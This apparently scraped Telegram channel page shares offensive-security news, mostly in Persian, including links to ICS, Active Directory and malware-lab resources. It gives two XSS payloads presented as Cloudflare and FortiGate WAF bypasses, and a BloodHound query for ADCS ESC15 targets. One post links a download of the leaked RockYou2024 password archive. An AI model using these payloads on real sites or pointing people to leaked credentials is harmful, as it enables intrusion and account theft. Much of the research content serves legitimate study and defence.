P.F.K Security
@PfkSecurity
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
About
Blog
Apps
Platform
Join
P.F.K Security
1.61K subscribers
P.F.K Security
MODBUS Penetration Testing Framework

https://github.com/trouat/smod

@pfksecurity
GitHub
GitHub - trouat/smod: MODBUS Penetration Testing Framework
MODBUS Penetration Testing Framework. Contribute to trouat/smod development by creating an account on GitHub.
673 views
P.F.K Security
CLOUDFLARE BYPASS xss

PAYLOAD:

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


FortiGate WAF bypass

<details open ontoggle="(()=>alertibrahimxss)()"></details>

#exploit #bypass
@pfkSecurity
609 views
P.F.K Security
BloodHound ADCS ESC15 (EKUwu) cypher query.

از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالب‌های گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده می‌کند.

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

@PfkSecurity
581 views
P.F.K Security
https://bible.malcore.io/readme/the-beginning/introduction-to-malware
#malware
@PfkSecurity
638 views
P.F.K Security
https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/
HarfangLab | Your endpoints, our protection
HijackLoader evolution: abusing genuine signing certificates
Our telemetry has revealed a significant increase in Lumma Stealer malware deployments via the HijackLoader malicious loader.
650 views
P.F.K Security
ssa-589181.pdf
34.9 KB
SSA-589181: Denial-Of-Service in SIMATIC S7-200 SMART CPU
Family Devices

@PfkSecurity
662 views
P.F.K Security
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.

@PfkSecurity
874 views
P.F.K Security
https://research.nccgroup.com/2024/06/11/pumping-iron-on-the-musl-heap-real-world-cve-2022-24834-exploitation-on-an-alpine-mallocng-heap/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
703 views
P.F.K Security
https://t.iss.one/+114BerAH5lo1ODM0
Telegram
P.F.K Security Chat
You’ve been invited to join this group on Telegram.
671 views
P.F.K Security
A collection of ICS/SCADA PCAPs

https://github.com/automayt/ICS-pcap

@PfkSecurity
GitHub
GitHub - automayt/ICS-pcap: A collection of ICS/SCADA PCAPs
A collection of ICS/SCADA PCAPs. Contribute to automayt/ICS-pcap development by creating an account on GitHub.
748 views
P.F.K Security
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
GitHub
GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods…
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
689 views
P.F.K Security
415 views
P.F.K Security
P.F.K Security
Photo
۲۵ آسیب‌پذیری برتر CWE و برترین آسیب‌پذیری‌های مورد بهره‌برداری معمول

در حالی که من در تعطیلات بودم، MITER 25 مورد از خطرناک ترین نقص های نرم افزاری را برای سال 2024 به روز کرد و CISA&Co بهترین آسیب پذیری های مورد سوء استفاده منظم را برای سال 2023 معرفی کرد .

25 top CWE 2024
در مقایسه با سال 2023 تغییرات زیادی در نقص های برتر نرم افزار وجود دارد. اول از همه، این ممکن است به دلیل تغییر در روش تجزیه و تحلیل باشد. در عین حال، نویسندگان تاکید می‌کنند که مشکلات پر کردن پایگاه داده NVD و خطاها در تعیین نقص نهایی CWE که باعث آسیب‌پذیری شده است، ممکن است بر دقت بالای ارائه شده تأثیر بگذارد، اما "به احتمال زیاد، همه چیز در حد خطای قابل قبول است."😅
می‌توانید در مورد نتیجه‌گیری‌های اصلی اینجا بیشتر بخوانید، و همچنین به شما توصیه می‌کنم به تحلیل‌های مشابهی از شرکت DogeSec نگاه کنید، که آنها در پایان اکتبر انجام دادند (بالای آنها در صفحه دوم است) - تفاوت‌هایی با top MITER وجود دارد. ، اما قابل توجه نیست.
برای خودم، وارد شدن به نقص‌های اصلی «افشای اطلاعات محرمانه به افراد غیرمجاز» (CWE-200) و «مصرف کنترل‌نشده منابع» (CWE-400) را برجسته کردم، که به ترتیب می‌تواند منجر به نشت و حملات DoS شود.😑

برترین آسیب پذیری های 2023 که به طور معمول مورد سوء استفاده قرار گرفته اند
این بار آسیب‌پذیری‌هایی که به‌طور منظم/«هر روزه» مورد سوء استفاده قرار می‌گیرند شامل 15+32 آسیب‌پذیری است.
چیزهای جالب:
➡️ در میان 15 مورد برتر تنها یک آسیب پذیری در نرم افزار منبع باز (log4j) یافت می شود.
ما نباید در اینجا نتیجه بگیریم که نرم افزار منبع باز امن تر است، بلکه شرکت های ثروتمندی که از نرم افزار و سخت افزار اختصاصی استفاده می کنند بیشتر مورد حمله قرار می گیرند.
در عین حال، وجود یک آسیب‌پذیری 2021 در بالای 2023 نیز نشان می‌دهد که بسیاری از سازمان‌ها هنوز نسخه لو رفتن log4j را دارند و در به‌روزرسانی وابستگی‌ها مشکل دارند.🥲
-> یک سوم آسیب‌پذیری‌ها کد بهره‌برداری عمومی (در MetaSploit/Nuclei) ندارند.
-> بیش از یک سوم آسیب‌پذیری‌های برتر، آسیب‌پذیری‌های تجهیزات شبکه است.
اطلاعات دقیق در مورد آسیب پذیری های برتر را می توان در این مخزن یافت.

#vm #cve #mitre #cisa #cwe #vulnerability
@PfkSecurity
498 viewsedited  
P.F.K Security
یک لیست عالی از Security for IoT and Embedded Systems:

☢️ https://github.com/phodal/awesome-iot
☢️ https://github.com/nebgnahz/awesome-iot-hacks
☢️ https://github.com/nutc4k3/amazing-iot-security
☢️ https://github.com/fkie-cad/awesome-embedded-and-iot-security
#IoT
@PfkSecurity
GitHub
GitHub - phodal/awesome-iot: Awesome IoT. A collaborative list of great resources about IoT Framework, Library, OS, Platform
Awesome IoT. A collaborative list of great resources about IoT Framework, Library, OS, Platform - phodal/awesome-iot
494 views
P.F.K Security
https://github.com/An0nUD4Y/AV-EDR-Lab-Environment-Setup
GitHub
GitHub - An0nUD4Y/AV-EDR-Lab-Environment-Setup: AV/EDR Lab environment setup references to help in Malware development
AV/EDR Lab environment setup references to help in Malware development - An0nUD4Y/AV-EDR-Lab-Environment-Setup
457 views
P.F.K Security
This media is not supported in your browser
VIEW IN TELEGRAM
💡 چگونه احراز هویت Kerberos در مورد روابط اعتماد دو طرفه متقابل دامنه کار می کند

#windows #cheatsheet
@PfkSecurity
493 views
P.F.K Security
آرشیو RockYou2024 در شبکه ظاهر شده است که به صورت آرشیو شده 45 گیگابایت حجم دارد (وزن بسته بندی نشده 156 گیگابایت)

📦 دانلود و استفاده کنید: https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip

#leak #security
@PfkSecurity
666 views
P.F.K Security
This media is not supported in your browser
VIEW IN TELEGRAM
🔐 چگونه احراز هویت Kerberos هنگامی که سرویس برای تفویض اختیار بدون محدودیت پیکربندی شده است کار می کند

#cheatsheet #redteam #pentest
@pfksecurity
831 viewsedited